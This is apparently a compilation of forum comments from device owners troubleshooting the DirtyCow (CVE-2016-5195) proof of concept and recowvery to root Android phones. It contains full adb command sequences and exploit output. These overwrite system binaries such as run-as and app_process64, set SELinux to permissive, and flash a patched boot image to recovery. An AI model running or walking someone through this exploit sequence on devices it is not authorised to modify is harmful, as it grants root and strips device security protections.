context 0 u:r:shell:s0
shell@h1:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0

First of all thank you for exploit for privilege escalation! Could you tell me please how can I use it?
I'm beginner, can anybody guide me through? Some say that some lines of code is missing for proper work. Is that true?

Stuck in an unrooted non stock rom. OEM unlocked. USB Debugging ON. getenforce permissive. Full log. Everything works up till run-as. Offering $50 to whoever can help fix this. Full log of adb command:

`C:\Users\darkseid\Desktop\LG_stuff>adb push dirtycow /data/local/tmp
dirtycow: 1 file pushed. 0.2 MB/s (9984 bytes in 0.042s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-applypatch /data/local/tmp
recowvery-applypatch: 1 file pushed. 1.7 MB/s (18472 bytes in 0.011s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-app_process64 /data/local/tmp
recowvery-app_process64: 1 file pushed. 1.0 MB/s (10200 bytes in 0.009s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-run-as /data/local/tmp
recowvery-run-as: 1 file pushed. 0.9 MB/s (10192 bytes in 0.011s)

C:\Users\darkseid\Desktop\LG_stuff>adb shell
elsa:/ $ cd /data/local/tmp
elsa:/data/local/tmp $ ls
dirtycow recowvery-app_process64 recowvery-applypatch recowvery-run-as
elsa:/data/local/tmp $ chmod 0777 *
elsa:/data/local/tmp $ ./dirtycow /system/bin/applypatch recowvery-applypatch
warning: new file size (18472) and file old size (165144) differ

size 165144

[] mmap 0x79eac35000
[] exploit (patch)
[] currently 0x79eac35000=10102464c457f
[] madvise = 0x79eac35000 165144
[] madvise = 0 1048576
[] /proc/self/mem 1367343104 1048576
[*] exploited 0x79eac35000=10102464c457f
elsa:/data/local/tmp $ ./dirtycow /system/bin/app_process64 recowvery-app_process64
warning: new file size (10200) and file old size (18600) differ

size 18600

[] mmap 0x7280bda000
[] exploit (patch)
[] currently 0x7280bda000=10102464c457f
[] madvise = 0x7280bda000 18600
[] madvise = 0 1048576
[] /proc/self/mem -1971322880 1048576
[*] exploited 0x7280bda000=10102464c457f
elsa:/data/local/tmp $ exit

C:\Users\darkseid\Desktop\LG_stuff>adb logcat -s recowvery
--------- beginning of system
--------- beginning of main
--------- beginning of crash
01-21 19:34:18.696 7457 7457 I recowvery: Welcome to recowvery! (app_process64)
01-21 19:34:18.696 7457 7457 I recowvery: ------------
01-21 19:34:18.697 7457 7457 I recowvery: Current selinux context: u:r:zygote:s0
01-21 19:34:18.697 7457 7457 I recowvery: Set context to 'u:r:system_server:s0'
01-21 19:34:18.698 7457 7457 I recowvery: Current security context: u:r:system_server:s0
01-21 19:34:18.698 7457 7457 I recowvery: Setting property 'ctl.start' to 'flash_recovery'
01-21 19:34:18.708 7457 7457 I recowvery: ------------
01-21 19:34:18.708 7457 7457 I recowvery: Recovery flash script should have started!
01-21 19:34:18.708 7457 7457 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery
01-21 19:34:18.708 7457 7457 I recowvery: Waiting 120 seconds...
01-21 19:34:18.756 7461 7461 I recowvery: Welcome to recowvery! (applypatch)
01-21 19:34:18.757 7461 7461 I recowvery: ------------
01-21 19:34:18.757 7461 7461 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'...
01-21 19:34:18.871 7461 7461 I recowvery: Loaded boot image!
01-21 19:34:18.871 7461 7461 I recowvery: ------------
01-21 19:34:18.871 7461 7461 I recowvery: Saving old ramdisk to file
01-21 19:34:18.892 7461 7461 I recowvery: Writing to file '/cache/ramdisk.gz'...
01-21 19:34:18.930 7461 7461 I recowvery: Wrote OK: 7100944 bytes
01-21 19:34:18.930 7461 7461 I recowvery: Decompressing ramdisk (gzip -d)
01-21 19:34:19.357 7461 7461 I recowvery: Checking '/cache/ramdisk.cpio' for validity (size >= 4194304 bytes)
01-21 19:34:19.357 7461 7461 I recowvery: '/cache/ramdisk.cpio': 18494316 bytes
01-21 19:34:19.357 7461 7461 I recowvery: File OK
01-21 19:34:19.357 7461 7461 I recowvery: Decompression of ramdisk successful
01-21 19:34:19.357 7461 7461 I recowvery: Deleting '/cache/ramdisk.gz' (no longer needed)
01-21 19:34:19.363 7461 7461 I recowvery: ------------
01-21 19:34:19.363 7461 7461 I recowvery: Opened cpio archive '/cache/ramdisk.cpio' (18494316 bytes)
01-21 19:34:19.363 7461 7461 I recowvery: Wrote new file (308 bytes) to cpio archive,
01-21 19:34:19.363 7461 7461 I recowvery: Final size: 18494624 bytes
01-21 19:34:19.363 7461 7461 I recowvery: ------------
01-21 19:34:19.363 7461 7461 I recowvery: Compressing cpio to ramdisk (gzip -9 -c)
01-21 19:34:25.911 7461 7461 I recowvery: Checking '/cache/ramdisk.gz' for validity (size >= 2097152 bytes)
01-21 19:34:25.912 7461 7461 I recowvery: '/cache/ramdisk.gz': 7079535 bytes
01-21 19:34:25.912 7461 7461 I recowvery: File OK
01-21 19:34:25.912 7461 7461 I recowvery: Compression of ramdisk successful
01-21 19:34:25.912 7461 7461 I recowvery: Deleting '/cache/ramdisk.cpio' (no longer needed)
01-21 19:34:25.930 7461 7461 I recowvery: Loading new ramdisk into boot image
01-21 19:34:25.942 7461 7461 I recowvery: ------------
01-21 19:34:25.942 7461 7461 I recowvery: cmdline: "console=ttyHSL0,115200,n8 androidboot.console=ttyHSL0 user_debug=31 ehci-hcd.park=3 lpm_levels.sleep_disabled=1 cma=32M@0-0xffffffff androidboot.hardware=elsa androidboot.selinux=permissive enforcing=0"
01-21 19:34:25.942 7461 7461 I recowvery: Setting permissive arguments on cmdline
01-21 19:34:25.942 7461 7461 I recowvery: cmdline: "console=ttyHSL0,115200,n8 androidboot.console=ttyHSL0 user_debug=31 ehci-hcd.park=3 lpm_levels.sleep_disabled=1 cma=32M@0-0xffffffff androidboot.hardware=elsa androidboot.selinux=permissive enforcing=0"
01-21 19:34:25.942 7461 7461 I recowvery: ------------
01-21 19:34:25.942 7461 7461 I recowvery: Updating boot image hash
01-21 19:34:26.363 7461 7461 I recowvery: Writing modified boot image to block device '/dev/block/bootdevice/by-name/recovery'...
01-21 19:34:26.581 7461 7461 I recowvery: Done!
01-21 19:34:26.581 7461 7461 I recowvery: ------------
01-21 19:34:26.581 7461 7461 I recowvery: Permissive boot has been has been flashed to /dev/block/bootdevice/by-name/recovery successfully!
01-21 19:34:26.581 7461 7461 I recowvery: You may use 'reboot recovery' now to enter a permissive system.
01-21 19:34:26.581 7461 7461 I recowvery: ***********************************************
01-21 19:34:26.581 7461 7461 I recowvery: * give jcadduono a hug, will ya? *
01-21 19:34:26.581 7461 7461 I recowvery: ***********************************************
^C
C:\Users\darkseid\Desktop\LG_stuff>adb shell reboot recovery

C:\Users\darkseid\Desktop\LG_stuff>adb shell
elsa:/ $ getenforce
Permissive
elsa:/ $ cd /data/local/tmp
elsa:/data/local/tmp $ ./dirtycow /system/bin/run-as recowvery-run-as
warning: new file size (10192) and file old size (14360) differ

size 14360

[] mmap 0x7864c47000
[] exploit (patch)
[] currently 0x7864c47000=10102464c457f
[] madvise = 0x7864c47000 14360
[] madvise = 0 1048576
[] /proc/self/mem -2122317824 1048576
[*] exploited 0x7864c47000=10102464c457f
elsa:/data/local/tmp $ run-as exec ./recowvery-applypatch boot
Welcome to recowvery! (run-as)

Current uid: 2000
Setting capabilities
Could not set capabilities
Error 1: Operation not permitted`

I am trying to compile the PoC on android-16 (Android 4.1.2). In theory, DirtyCow, should be working because it's a Linux kernel 3.0.31. But it's not building :(

I modified the Makefile:
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16

Unfortunately, it fails with several errors:

$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
...
armeabi-v7a] Compile thumb  : run-as <= run-as.c
In file included from ./run-as.c:3:
In file included from /usr/include/sys/capability.h:30:
/usr/include/sys/xattr.h:41:2: error: expected function body after function
      declarator
        __THROW;
        ^
/usr/include/sys/xattr.h:48:2: error: expected function body after function
      declarator
        __THROW;
        ^
/usr/include/sys/xattr.h:53:37: error: expected function body after function
      declarator
                      size_t __size, int __flags) __THROW;
                                                  ^

Any idea?
Thanks!

I want to know what can be change to get root access to patch unlock and root a 6.0 android.

Next phone: Huawei P8

Output:

MBP-Krzysztof:CVE-2016-5195 krzysiek$ adb shell /system/bin/run-as
uid /system/bin/run-as 2000
setresgid/setresuid failed
uid 2000
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@hwALE-H:/ $ whoami
whoami
shell
shell@hwALE-H:/ $ id
id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0

Hello, I've been trying to get this to work and am running into the following. It looks like it's not properly swapping out the run-as command, despite saying exploited

$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
[100%] /data/local/tmp/dirtycow
adb push libs/armeabi/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (13776) and file old size (14192) differ

size 14192


[*] mmap 0xf70b1000
[*] exploit (patch)
[*] currently 0xf70b1000=464c457f
[*] madvise = 0xf70b1000 14192
[*] madvise = 0 1048576
[*] /proc/self/mem -1048576 1048576
[*] exploited 0xf70b1000=464c457f
adb shell /system/bin/run-as
run-as: Usage:
    run-as <package-name> [--user <uid>] <command> [<args>]

Tested to see if my phone is vulnerable, and now, how is the procedure to remove it from there?

Will the presence of it there result in problems with OTA updates?

Best regards,
Claudemir